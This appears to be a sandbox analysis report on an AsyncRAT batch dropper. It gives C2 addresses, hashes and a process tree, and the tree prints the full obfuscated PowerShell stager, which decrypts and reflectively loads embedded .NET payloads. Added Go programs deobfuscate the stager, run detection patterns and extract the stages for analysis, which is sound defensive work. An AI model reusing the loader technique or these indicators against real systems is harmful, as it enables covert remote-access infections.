Resubmissions
submitted          task id             score
23-05-2024 05:33   240523-f8yy7afc8w   10
22-05-2024 19:39   240522-yc9d6adh9s   10
22-05-2024 19:09   240522-xtyhjsdb21   10
22-05-2024 19:06   240522-xscvfsda5y   10
22-05-2024 16:28   240522-tyxj9shb7z   10
Analysis
max time kernel: 85s
max time network: 86s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-05-2024 19:06
Static task
static1
General
Target: Inital.bat
Size: 63KB
MD5: e9319ac7284b6bbadf0200fee286b6c1
SHA1: 51c30382aa103118937f1a9bf453a8345febafb4
SHA256: 09d4308c18ecece489a51b7837968bcfc6c1273d83f5c83614bbdd119ccf6961
SHA512: 73e349b61c285cdb3cfdf41ae9ba166cc0f8e5c7b989bf744f9aa8433baf41ea3a01b46fa9a88cc97fa4ca5d80f57a9dbd8fea631a164566c9e95632c9f3404b
SSDEEP: 1536:Z6e+aDqc6V/xOtoqfF4OycI/k0xqAD/xtM:Z6aDqpVuoqKL5fkAvM
Malware Config
Extracted
Family: asyncrat
Version: 0.5.8
Botnet: RATED
C2: 147.185.221.17:25565, 147.185.221.17:37531
Mutex: Dudee4vQEqBD
delay: 3
install: false
install_file: AnticheatBiner.exe
install_folder: %AppData%
Signatures
Async RAT payload (2 IoCs)
  resource                                                                      yara_rule
  behavioral1/memory/1772-24-0x00000000074D0000-0x00000000074E2000-memory.dmp   family_asyncrat
  behavioral1/memory/2960-43-0x00000000069A0000-0x00000000069B2000-memory.dmp   family_asyncrat
Blocklisted process makes network request (16 IoCs)
  flow  pid   process
  19    1772  powershell.exe
  27    1772  powershell.exe
  29    1772  powershell.exe
  31    1772  powershell.exe
  32    1772  powershell.exe
  33    1772  powershell.exe
  44    1772  powershell.exe
  45    1772  powershell.exe
  46    1772  powershell.exe
  47    1772  powershell.exe
  49    1772  powershell.exe
  51    1772  powershell.exe
  61    1772  powershell.exe
  62    1772  powershell.exe
  63    1772  powershell.exe
  64    1772  powershell.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 2 IoCs)
  Runs PowerShell with its display window hidden.
  pid   process
  1772  powershell.exe
  2960  powershell.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid   process
  1772  powershell.exe
  1772  powershell.exe
  2960  powershell.exe
  2960  powershell.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description                pid   process
  Token: SeDebugPrivilege    1772  powershell.exe
  Token: SeDebugPrivilege    2960  powershell.exe
Suspicious use of WriteProcessMemory (6 IoCs)
  description                        pid   process  target process
  PID 4460 wrote to memory of 1772   4460  cmd.exe  powershell.exe
  PID 4460 wrote to memory of 1772   4460  cmd.exe  powershell.exe
  PID 4460 wrote to memory of 1772   4460  cmd.exe  powershell.exe
  PID 1000 wrote to memory of 2960   1000  cmd.exe  powershell.exe
  PID 1000 wrote to memory of 2960   1000  cmd.exe  powershell.exe
  PID 1000 wrote to memory of 2960   1000  cmd.exe  powershell.exe
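The "Command and Scripting Interpreter: PowerShell" signature fires on the hidden-window launch, but the more distinctive trait of this sample is how the stager hides its .NET API names: the powershell.exe command line in the process tree below never contains the strings FromBase64String, Load or ReadAllText. It writes them backwards ('gnirtS46esaBmorF'), slices the string with [-1..-16] to reverse it at run time, and calls the method through PowerShell's dynamic member syntax [System.Convert]::(...)(...). A keyword match on the raw command line therefore misses the reflective loader. The following Go program is an added example, not part of the Triage report or of the sample: it undoes the reversed-literal trick, then runs a few command-line checks over constructed process-creation records (the first one abbreviates the command line observed in this report, the other two are made up). The check names, the regular expressions and the records are mine; the obfuscated strings and the base64 key value come from the report.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// PowerShell's 'gnirtS46esaBmorF'[-1..-16] -join '' idiom stores a method name
// backwards and reverses it at run time, so "FromBase64String" never appears
// literally in the command line. This pattern matches that idiom.
var reversedLiteral = regexp.MustCompile(`(?i)'([^']*)'\[-1\.\.-(\d+)\]\s*-join\s*''`)

// deobfuscate rewrites each reversed literal to the string PowerShell would
// build, but only when the slice covers the whole literal; anything else is
// left as-is for a human to inspect.
func deobfuscate(cmd string) string {
	return reversedLiteral.ReplaceAllStringFunc(cmd, func(m string) string {
		sub := reversedLiteral.FindStringSubmatch(m)
		r := []rune(sub[1])
		if n, err := strconv.Atoi(sub[2]); err != nil || n != len(r) {
			return m
		}
		for i, j := 0, len(r)-1; i < j; i, j = i+1, j-1 {
			r[i], r[j] = r[j], r[i]
		}
		return "'" + string(r) + "'"
	})
}

// A check runs against the lower-cased command line: "onRaw" checks see the
// obfuscation (so they can flag it), the others see the deobfuscated text so
// that API names match.
type check struct {
	name  string
	onRaw bool
	re    *regexp.Regexp
}

var checks = []check{
	// powershell.exe accepts any unambiguous prefix of a switch (-nop, -w, -ep ...),
	// so the patterns allow the abbreviations rather than the full names only.
	{"no_profile", true, regexp.MustCompile(`-nop[rofile]*\b`)},
	{"hidden_window", true, regexp.MustCompile(`-w[indowstyle]*\s+hidden`)},
	{"execution_policy_bypass", true, regexp.MustCompile(`-e[xecutionpolicy]+\s+bypass`)},
	{"reversed_string_obfuscation", true, reversedLiteral},
	{"reflective_assembly_load", false, regexp.MustCompile(`\[system\.reflection\.assembly\]::\(?'?load'?\)?\(`)},
	{"reads_own_batch", false, regexp.MustCompile(`readalltext'?\)?\('[^']*\.bat'\)`)},
}

// analyze returns the names of the checks that fire, in the fixed order above.
func analyze(cmdline string) []string {
	raw := strings.ToLower(cmdline)
	norm := strings.ToLower(deobfuscate(cmdline))
	var hits []string
	for _, c := range checks {
		s := norm
		if c.onRaw {
			s = raw
		}
		if c.re.MatchString(s) {
			hits = append(hits, c.name)
		}
	}
	return hits
}

// Constructed process-creation records, not real telemetry. The first one
// abbreviates the powershell.exe command line from this report's process tree.
type procEvent struct{ parent, image, cmdline string }

var sampleEvents = []procEvent{
	{"cmd.exe", "powershell.exe", `"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rQsZbBPOPJCvxNhL0LUES/xBoGdJPo5xjQuRz/WAY2Y='); } function execute_function($param_var,$param2_var){ $ILwNn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); } $AUAcT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Inital.bat')`},
	{"explorer.exe", "powershell.exe", `powershell.exe -NoProfile -Command Get-Service -Name WinRM`},
	{"cmd.exe", "powershell.exe", `powershell.exe -nop -w hidden -ep bypass -c "Get-Date"`},
}

func main() {
	for _, e := range sampleEvents {
		fmt.Printf("%s -> %s: %v\n", e.parent, e.image, analyze(e.cmdline))
	}
}
```

The deobfuscation step is what separates the stager from the ordinary "-nop -w hidden -ep bypass" launcher: on the third record only the launch switches fire, while on the first the reflective Assembly.Load and the read of the launching .bat file become visible once the reversed literals are restored. The prefix-tolerant switch patterns are deliberately loose; tighten them if they produce noise in your environment.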
Processes
C:\Windows\system32\cmd.exe  (depth 1)
  command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Inital.bat"
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (depth 2, child of the cmd.exe above)
    command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rQsZbBPOPJCvxNhL0LUES/xBoGdJPo5xjQuRz/WAY2Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DjbA3otpI3NZoCoqJZkIpQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XrWyO=New-Object System.IO.MemoryStream(,$param_var); $udTvC=New-Object System.IO.MemoryStream; $DGCBl=New-Object System.IO.Compression.GZipStream($XrWyO, [IO.Compression.CompressionMode]::Decompress); $DGCBl.CopyTo($udTvC); $DGCBl.Dispose(); $XrWyO.Dispose(); $udTvC.Dispose(); $udTvC.ToArray();}function execute_function($param_var,$param2_var){ $ILwNn=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XDsjo=$ILwNn.EntryPoint; $XDsjo.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Inital.bat';$AUAcT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Inital.bat').Split([Environment]::NewLine);foreach ($RmJpd in $AUAcT) { if ($RmJpd.StartsWith(':: ')) { $jmZjY=$RmJpd.Substring(3); break; }}$payloads_var=[string[]]$jmZjY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\rundll32.exe  (depth 1)
  command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\cmd.exe  (depth 1)
  command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Inital.bat" "
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (depth 2, child of the cmd.exe above)
    command line: identical to the powershell.exe command line of the first cmd.exe tree above
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
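The powershell.exe command line above is the entire loader. It reads the batch file that launched it, takes the first line that begins with ":: " (a batch comment, so cmd.exe ignores it), splits that line on a backslash into two base64 blobs, and pushes each through base64 decode, AES-CBC/PKCS7 decryption with the hard-coded key and IV, and GZip decompression. Each result is a .NET assembly that is loaded with Assembly.Load and started through its EntryPoint; the first gets $null as its arguments, the second an empty string array. Because the key and IV sit in plain text in the command line, the stages can be recovered without running anything. The Go program below is an added example, not code from the report or from the sample: it performs the same decode chain and returns the bytes instead of loading them. The key and IV are the ones in the command line; the batch file it parses by default is a constructed stand-in with two short strings in place of the real assemblies, built by the inverse transform in the same file.

```go
package main

import (
	"bytes"
	"compress/gzip"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
	"io"
	"strings"
)

// Key and IV copied verbatim from the stager's command line: base64 of a
// 32-byte key (so AES-256) and a 16-byte IV. Swap them for another sample.
var (
	stagerKey, _ = base64.StdEncoding.DecodeString("rQsZbBPOPJCvxNhL0LUES/xBoGdJPo5xjQuRz/WAY2Y=")
	stagerIV, _  = base64.StdEncoding.DecodeString("DjbA3otpI3NZoCoqJZkIpQ==")
)

// payloadLine mirrors the stager: the first line that starts with ":: "
// carries the base64 stages, separated by a backslash.
func payloadLine(batch string) (string, bool) {
	for _, line := range strings.Split(strings.ReplaceAll(batch, "\r\n", "\n"), "\n") {
		if strings.HasPrefix(line, ":: ") {
			return line[3:], true
		}
	}
	return "", false
}

// decodePayload reverses one stage exactly as decrypt_function and
// decompress_function do (base64 -> AES-CBC/PKCS7 -> gzip), but returns the
// bytes instead of handing them to Assembly.Load.
func decodePayload(b64 string) ([]byte, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("ciphertext length %d is not a multiple of 16", len(ct))
	}
	block, _ := aes.NewCipher(stagerKey) // key length is fixed above
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, stagerIV).CryptBlocks(pt, ct)
	// Go's CBC API leaves PKCS#7 padding in place; validate it before stripping.
	n := int(pt[len(pt)-1])
	if n == 0 || n > aes.BlockSize || !bytes.Equal(pt[len(pt)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, fmt.Errorf("bad PKCS#7 padding: wrong key/IV or corrupt data")
	}
	zr, err := gzip.NewReader(bytes.NewReader(pt[:len(pt)-n]))
	if err != nil {
		return nil, err
	}
	defer zr.Close()
	// Cap the inflated size: the input is attacker-controlled.
	return io.ReadAll(io.LimitReader(zr, 64<<20))
}

// extractPayloads returns every stage in execution order (the stager invokes
// stage 0 with $null and stage 1 with an empty string[]).
func extractPayloads(batch string) ([][]byte, error) {
	line, ok := payloadLine(batch)
	if !ok {
		return nil, fmt.Errorf("no ':: ' payload line found")
	}
	var stages [][]byte
	for i, part := range strings.Split(line, `\`) {
		p, err := decodePayload(part)
		if err != nil {
			return nil, fmt.Errorf("stage %d: %w", i, err)
		}
		stages = append(stages, p)
	}
	return stages, nil
}

// encodePayload is the forward transform (gzip -> AES-CBC/PKCS7 -> base64).
// It exists only to build the constructed sample; no real payload is reproduced.
func encodePayload(plain []byte) string {
	var zb bytes.Buffer
	zw := gzip.NewWriter(&zb)
	zw.Write(plain)
	zw.Close()
	z := zb.Bytes()
	pad := aes.BlockSize - len(z)%aes.BlockSize
	z = append(z, bytes.Repeat([]byte{byte(pad)}, pad)...)
	block, _ := aes.NewCipher(stagerKey)
	ct := make([]byte, len(z))
	cipher.NewCBCEncrypter(block, stagerIV).CryptBlocks(ct, z)
	return base64.StdEncoding.EncodeToString(ct)
}

// Constructed stand-ins for the two .NET assemblies, laid out the way the
// stager expects (the batch file's own launcher line is omitted).
const sampleStage1, sampleStage2 = "CONSTRUCTED stage 0 stand-in", "CONSTRUCTED stage 1 stand-in"

func sampleBatch() string {
	return "@echo off\r\n:: " + encodePayload([]byte(sampleStage1)) + `\` + encodePayload([]byte(sampleStage2)) + "\r\n"
}

func main() {
	stages, err := extractPayloads(sampleBatch())
	if err != nil {
		panic(err)
	}
	for i, s := range stages {
		fmt.Printf("stage %d: %d bytes: %q\n", i, len(s), s)
	}
}
```

To run it against the real file, read Inital.bat with os.ReadFile, pass the contents to extractPayloads and write each returned slice to disk with os.WriteFile; the two outputs should then be PE files (MZ header) that can be opened in a .NET decompiler. The padding check matters in practice: AES-CBC gives no integrity, so a wrong key or a damaged sample surfaces as a padding or gzip error rather than as silently wrong bytes, which is why the example tests that path as well as the round trip.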
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  Filesize: 53KB
  MD5: 06ad34f9739c5159b4d92d702545bd49
  SHA1: 9152a0d4f153f3f40f7e606be75f81b582ee0c17
  SHA256: 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
  SHA512: c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f1mzw1cf.4xv.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
Memory dumps (name, filesize)
  memory/1772-20-0x0000000007B50000-0x00000000081CA000-memory.dmp  6.5MB
  memory/1772-4-0x00000000750B0000-0x0000000075860000-memory.dmp   7.7MB
  memory/1772-21-0x00000000068B0000-0x00000000068CA000-memory.dmp  104KB
  memory/1772-5-0x0000000005320000-0x0000000005342000-memory.dmp   136KB
  memory/1772-7-0x0000000005DB0000-0x0000000005E16000-memory.dmp   408KB
  memory/1772-6-0x0000000005D40000-0x0000000005DA6000-memory.dmp   408KB
  memory/1772-2-0x00000000750B0000-0x0000000075860000-memory.dmp   7.7MB
  memory/1772-17-0x0000000005E20000-0x0000000006174000-memory.dmp  3.3MB
  memory/1772-22-0x00000000068F0000-0x00000000068F8000-memory.dmp  32KB
  memory/1772-19-0x0000000006320000-0x000000000636C000-memory.dmp  304KB
  memory/1772-0-0x00000000750BE000-0x00000000750BF000-memory.dmp   4KB
  memory/1772-3-0x00000000054F0000-0x0000000005B18000-memory.dmp   6.2MB
  memory/1772-18-0x00000000062F0000-0x000000000630E000-memory.dmp  120KB
  memory/1772-24-0x00000000074D0000-0x00000000074E2000-memory.dmp  72KB
  memory/1772-23-0x0000000006900000-0x000000000690E000-memory.dmp  56KB
  memory/1772-28-0x00000000750BE000-0x00000000750BF000-memory.dmp  4KB
  memory/1772-29-0x00000000750B0000-0x0000000075860000-memory.dmp  7.7MB
  memory/1772-30-0x00000000750B0000-0x0000000075860000-memory.dmp  7.7MB
  memory/1772-1-0x0000000002E10000-0x0000000002E46000-memory.dmp   216KB
  memory/2960-32-0x00000000750B0000-0x0000000075860000-memory.dmp  7.7MB
  memory/2960-31-0x00000000750B0000-0x0000000075860000-memory.dmp  7.7MB
  memory/2960-43-0x00000000069A0000-0x00000000069B2000-memory.dmp  72KB